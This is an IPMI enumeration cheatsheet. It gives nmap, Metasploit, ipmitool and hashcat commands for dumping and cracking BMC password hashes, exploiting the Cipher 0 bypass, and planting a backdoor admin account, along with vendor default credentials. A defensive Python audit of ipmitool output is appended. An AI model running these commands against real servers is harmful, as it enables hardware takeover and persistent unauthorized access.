# IPMI Enumeration Cheatsheet

Default Port: 623 (UDP)

What is IPMI? Intelligent Platform Management Interface: out-of-band management for servers (Dell iDRAC, HP iLO, and other BMCs). It provides full remote control of the host even when its OS is down.
## Detection & Version

```bash
nmap -sU -p 623 <ip>
nmap -sU -p 623 --script ipmi-version <ip>
```

## Nmap Scripts

```bash
nmap -sU -p 623 --script ipmi-version <ip>        # BMC / IPMI version and auth info
nmap -sU -p 623 --script ipmi-cipher-zero <ip>    # Check for Cipher 0 auth bypass
```
## Metasploit Modules

```bash
# Version detection
use auxiliary/scanner/ipmi/ipmi_version
set RHOSTS <ip>
run

# Dump RAKP hashes (no auth needed)
use auxiliary/scanner/ipmi/ipmi_dumphashes
set RHOSTS <ip>
run

# Cipher 0 auth bypass (unauthenticated admin access)
use auxiliary/scanner/ipmi/ipmi_cipher_zero
set RHOSTS <ip>
run
```
## ipmitool (Direct Interaction)

```bash
# Chassis status (also confirms the credentials work)
ipmitool -I lanplus -H <ip> -U admin -P admin chassis status

# List users
ipmitool -I lanplus -H <ip> -U admin -P admin user list

# LAN config (auth types, enabled cipher suites)
ipmitool -I lanplus -H <ip> -U admin -P admin lan print

# Power control
ipmitool -I lanplus -H <ip> -U admin -P admin power status
ipmitool -I lanplus -H <ip> -U admin -P admin power reset

# Add user (post-compromise)
ipmitool -I lanplus -H <ip> -U admin -P admin user set name 4 hacker
ipmitool -I lanplus -H <ip> -U admin -P admin user set password 4 Password1
ipmitool -I lanplus -H <ip> -U admin -P admin user priv 4 4    # privilege level 4 = ADMINISTRATOR
ipmitool -I lanplus -H <ip> -U admin -P admin user enable 4
```
## Hash Cracking (After RAKP Dump)

```bash
# Hashcat mode 7300 = IPMI2 RAKP HMAC-SHA1
hashcat -m 7300 hashes.txt wordlist.txt
hashcat -m 7300 hashes.txt wordlist.txt -r rules/best64.rule
```
## Default Credentials

| Vendor / Interface | Username | Default Password |
|---|---|---|
| Dell iDRAC | root | calvin |
| HP iLO | Administrator | (printed on pull tab) |
| Supermicro IPMI | ADMIN | ADMIN |
| IBM IMM | USERID | PASSW0RD |
| Cisco CIMC | admin | password |
| Intel RMM | admin | (blank) |
## Key Vulnerabilities

| Issue | Description |
|---|---|
| Cipher 0 | Cipher suite 0 means "no authentication": any password is accepted for a valid username, so an attacker gets admin access and can set any user's password |
| RAKP hash dump | The RAKP handshake returns a password-keyed HMAC for any requested username before the client proves anything, so hashes can be collected without credentials and cracked offline |
| Default creds | Most systems ship with known default credentials (see the table above) |
| Anonymous auth | Some BMCs allow completely anonymous access |
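Added example, not part of the cheatsheet: a defender-side audit that parses the output of the `lan print` and `user list` commands above and flags the misconfigurations in this table (cipher suite 0 enabled, auth type NONE, anonymous users, default vendor account names). The sample outputs are constructed, and the `audit_lan` / `audit_users` names are mine.

```python
import re

# Constructed sample of `ipmitool -I lanplus ... lan print` output (not from a real BMC)
LAN_PRINT = """\
Auth Type Support       : NONE MD2 MD5 PASSWORD
Auth Type Enable        : Callback : MD2 MD5 PASSWORD
                        : User     : NONE MD2 MD5 PASSWORD
                        : Admin    : MD2 MD5 PASSWORD
RMCP+ Cipher Suites     : 0,1,2,3,6,7,8,11,12
Cipher Suite Priv Max   : aaaaXXaaaXXaaXX
                        :     X=Cipher Suite Unused
"""
# Constructed sample of `ipmitool ... user list 1` output
USER_LIST = """\
ID  Name             Callin  Link Auth  IPMI Msg   Channel Priv Limit
1                    true    false      true       USER
2   ADMIN            true    true       true       ADMINISTRATOR
3   ops              true    true       true       USER
"""
DEFAULT_NAMES = {"root", "administrator", "admin", "userid"}  # vendor defaults from the table above
USER_ROW = re.compile(r"^(\d+)\s+(\S*)\s+(true|false)\s+(true|false)\s+(true|false)\s+(.+?)\s*$")

def audit_lan(text):
    """Flag cipher suite 0 and auth type NONE in `lan print` output."""
    findings, section = [], None
    for line in text.splitlines():
        key, _, value = (p.strip() for p in line.partition(":"))
        section = key or section  # a blank key is a continuation of the previous field
        if section == "Cipher Suite Priv Max" and key:
            # One character per cipher suite 0..14; 'X' = disabled, any other letter enables it
            if value[:1] != "X":
                findings.append("cipher suite 0 enabled: any password is accepted")
        elif section == "Auth Type Enable" and ":" in value:
            level, _, types = value.partition(":")
            if "NONE" in types.split():
                findings.append(f"auth type NONE enabled for {level.strip()} privilege")
    return findings

def audit_users(text):
    """Flag anonymous access and default vendor account names in `user list` output."""
    findings = []
    for m in filter(None, map(USER_ROW.match, text.splitlines())):
        uid, name, ipmi_msg, priv = m.group(1), m.group(2), m.group(5), m.group(6)
        if not name and (ipmi_msg == "true" or priv != "NO ACCESS"):
            findings.append(f"user {uid} has an empty name but IPMI access ({priv}): anonymous login")
        elif name.lower() in DEFAULT_NAMES:
            findings.append(f"default vendor account '{name}' present ({priv}): verify the password was changed")
    return findings
```

On the BMC side, cipher suite 0 is disabled by setting its position to `X`, e.g. `ipmitool lan set 1 cipher_privs XaaaXXaaaXXaaXX` for channel 1.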